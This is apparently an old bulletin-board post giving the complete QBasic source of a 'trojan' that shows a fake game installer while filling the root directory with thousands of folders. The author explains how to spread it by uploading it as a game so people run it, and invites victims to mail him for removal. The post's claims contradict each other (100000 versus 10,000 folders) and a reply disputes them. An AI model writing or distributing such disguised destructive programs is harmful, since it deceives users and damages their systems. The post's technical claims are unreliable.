This is a little trojan I wrote in Qbasic !
10 REM killer by deadman
20 color 14,0
30 print"installing datafiles... Please wait..."
40 print"This may take up to 20 minutes, depending on your damn computer..."
50 shell "cd\"
60 for a = 1 to 10000
70 a$=str$(a)
80 c$="md" + a$ + ".hee"
90 shell c$
100 next a
110 cls
120 print"cricket2000 is now installed on your system..."
130 print"Have a shitty day!"
140 print " ?AM?"
150 print
160 input "Hit ENTER To REBOOT your System now!";a$
170 shell "boot.com"
180 END
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk
and
you CANNOT get rid of them without doing reverse engineering on the
program !(TO GET RID OF THEM MAIL ME ) To get rid of them any other
way you
would have to format c: or d:
-=-=
10,000 dirs in your root? 512 is the max.!
see for yourself!